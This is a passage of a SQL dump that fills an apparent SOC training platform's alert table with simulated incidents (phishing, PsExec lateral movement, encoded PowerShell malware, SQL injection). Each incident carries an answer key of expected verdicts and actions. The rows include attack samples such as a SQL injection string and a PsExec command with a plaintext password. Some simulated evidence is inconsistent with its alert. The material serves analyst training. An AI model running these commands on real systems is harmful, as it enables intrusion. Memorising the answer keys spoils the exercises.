2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T12:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"192.168.5.10\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"MAIL-SERVER\\\",\\\"email_sender\\\":\\\"support@micros0ft.com\\\",\\\"url\\\":\\\"http://malicious-link.com/reset\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T12:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"192.168.5.10\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"MAIL-SERVER\\\",\\\"email_sender\\\":\\\"support@micros0ft.com\\\",\\\"url\\\":\\\"http://malicious-link.com/reset\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T12:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"192.168.5.10\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"MAIL-SERVER\\\",\\\"email_sender\\\":\\\"support@micros0ft.com\\\",\\\"url\\\":\\\"http://malicious-link.com/reset\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1030, 'Legitimate Software Update Mistaken as Malware', 'medium', 'Splunk', 'A software update process was flagged as malicious due to heuristic detection, but analysis reveals it is benign.', 'Malware', 'T1203', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-17T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.6.30\",\"username\":\"m.brown\",\"hostname\":\"DEV-SERVER\",\"command_line\":\"C:\\\\Program Files\\\\Update\\\\updater.exe /silent\",\"file_hash\":\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\"}', '2026-01-17 19:11:07', '2026-02-26 22:01:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.6.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the development server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Update\\\\updater.exe /silent\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as part of a legitimate update process\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash matched known legitimate software update\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The flagged process was a legitimate software update misidentified by heuristic analysis.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.735Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T14:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.30\\\",\\\"username\\\":\\\"m.brown\\\",\\\"hostname\\\":\\\"DEV-SERVER\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Update\\\\\\\\updater.exe /silent\\\",\\\"file_hash\\\":\\\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.735Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T14:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.30\\\",\\\"username\\\":\\\"m.brown\\\",\\\"hostname\\\":\\\"DEV-SERVER\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Update\\\\\\\\updater.exe /silent\\\",\\\"file_hash\\\":\\\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.735Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T14:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.30\\\",\\\"username\\\":\\\"m.brown\\\",\\\"hostname\\\":\\\"DEV-SERVER\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Update\\\\\\\\updater.exe /silent\\\",\\\"file_hash\\\":\\\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.735Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T14:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.30\\\",\\\"username\\\":\\\"m.brown\\\",\\\"hostname\\\":\\\"DEV-SERVER\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Update\\\\\\\\updater.exe /silent\\\",\\\"file_hash\\\":\\\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.735Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T14:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.30\\\",\\\"username\\\":\\\"m.brown\\\",\\\"hostname\\\":\\\"DEV-SERVER\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Update\\\\\\\\updater.exe /silent\\\",\\\"file_hash\\\":\\\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1031, 'Lateral Movement Using PSExec Detected', 'high', 'SentinelOne', 'Detected lateral movement activity using PSExec, indicating possible internal reconnaissance or privilege escalation.', 'Lateral Movement', 'T1569.002', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-17T16:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.7.40\",\"dst_ip\":\"192.168.7.41\",\"username\":\"admin\",\"hostname\":\"CORP-ADMIN-PC\",\"command_line\":\"psexec.exe \\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.7.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP of the lateral movement attempt\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.7.41\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target IP of the lateral movement attempt\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec used for lateral movement activity\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"monitor_internal_traffic\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Use of PSExec for lateral movement suggests an attacker is attempting to move within the network.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.736Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T16:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.7.40\\\",\\\"dst_ip\\\":\\\"192.168.7.41\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-ADMIN-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.736Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T16:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.7.40\\\",\\\"dst_ip\\\":\\\"192.168.7.41\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-ADMIN-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.736Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T16:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.7.40\\\",\\\"dst_ip\\\":\\\"192.168.7.41\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-ADMIN-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.736Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T16:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.7.40\\\",\\\"dst_ip\\\":\\\"192.168.7.41\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-ADMIN-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.7.41 -u admin -p 
password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.736Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T16:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.7.40\\\",\\\"dst_ip\\\":\\\"192.168.7.41\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-ADMIN-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1041, 'Malware Detected: Known Malicious File Executed', 'critical', 'CrowdStrike', 'A known malware file was detected and executed on an internal host. The file hash is associated with multiple malware reports.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-22T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"198.51.100.5\",\"username\":\"jdoe\",\"hostname\":\"WIN-10JDOE\",\"command_line\":\"C:\\\\malware\\\\badfile.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"domain\":\"malicious-domain.com\"}', '2026-01-22 13:14:49', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with the affected machine.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in 62 antivirus engines indicating malware.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain involved in known malware distribution campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\badfile.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Execution of known malicious executable.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash and domain are confirmed malicious by multiple sources. 
Immediate host isolation and remediation are recommended.\"}', 'Novice', 'EDR', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1042, 'Malware Execution Detected on Internal Host', 'high', 'CrowdStrike', 'A suspicious process execution was detected on an internal host. The process matches a known malware signature, indicating potential compromise.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-23T14:22:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.88\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c powershell -enc aQBmKChUZXN0LU5ldChbU3lzdGVtLk5ldC5JUFZlcnNpb25TcGVjaWZpY2F0aW9uXSkpLkFkZHJlc3NFbmQ9PSIyMDMuMC4xMTMuODgiKXtJbnZva2UtV2ViUmVxdWVzdFswXTt9\"}', '2026-01-23 16:38:09', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c powershell -enc aQBmKChUZXN0LU5ldChbU3lzdGVtLk5ldC5JUFZlcnNpb25TcGVjaWZpY2F0aW9uXSkpLkFkZHJlc3NFbmQ9PSIyMDMuMC4xMTMuODgiKXtJbnZva2UtV2ViUmVxdWVzdFswXTt9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command executing a known malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious IP and the execution of an encoded PowerShell script indicate a malware infection.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, 
'{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1043, 'Potential SQL Injection Attack on Web Application', 'medium', 'Wazuh', 'A potential SQL injection attempt was detected targeting a web application. The attacker tried to manipulate the database query through user input.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-23T10:15:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.25\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"username\":\"guest\",\"hostname\":\"WEB-SERVER01\",\"url\":\"/login\"}', '2026-01-23 16:38:09', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP associated with scanning activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"/login\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Targeted login endpoint of the web application\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body contains a classic SQL injection pattern, indicating a true positive attack attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.740Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR 
\'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-23T10:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"url\\\":\\\"/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.740Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-23T10:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"url\\\":\\\"/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.740Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-23T10:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"url\\\":\\\"/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.740Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-23T10:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"url\\\":\\\"/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.740Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-23T10:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"url\\\":\\\"/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1044, 'Suspicious Activity Detected in Contact Importer', 'high', 'Security Information and Event Management (SIEM) logs', 'An unusual spike in API calls to the contact importer feature was detected, indicating a potential exploitation attempt to gain unauthorized access to user data. The activity appears to originate from a known malicious IP address.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"api_endpoint\":\"/api/v1/contact-import\",\"http_method\":\"POST\",\"request_headers\":{\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"Content-Type\":\"application/json\"},\"request_body\":\"{\\\"contacts\\\":[{\\\"name\\\":\\\"John Doe\\\",\\\"email\\\":\\\"john.doe@example.com\\\"}]}\",\"response_code\":500,\"user_agent_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jane.smith\",\"session_id\":\"abc123sessiontoken\"}', '2026-01-24 00:10:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks on public-facing applications.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server used for contact importing.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Associated with common user agents.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jane.smith\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Unusual 
activity detected for this user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.741Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"api_endpoint\\\":\\\"/api/v1/contact-import\\\",\\\"http_method\\\":\\\"POST\\\",\\\"request_headers\\\":{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"Content-Type\\\":\\\"application/json\\\"},\\\"request_body\\\":\\\"{\\\\\\\"contacts\\\\\\\":[{\\\\\\\"name\\\\\\\":\\\\\\\"John Doe\\\\\\\",\\\\\\\"email\\\\\\\":\\\\\\\"john.doe@example.com\\\\\\\"}]}\\\",\\\"response_code\\\":500,\\\"user_agent_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"session_id\\\":\\\"abc123sessiontoken\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.741Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"api_endpoint\\\":\\\"/api/v1/contact-import\\\",\\\"http_method\\\":\\\"POST\\\",\\\"request_headers\\\":{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"Content-Type\\\":\\\"application/json\\\"},\\\"request_body\\\":\\\"{\\\\\\\"contacts\\\\\\\":[{\\\\\\\"name\\\\\\\":\\\\\\\"John 
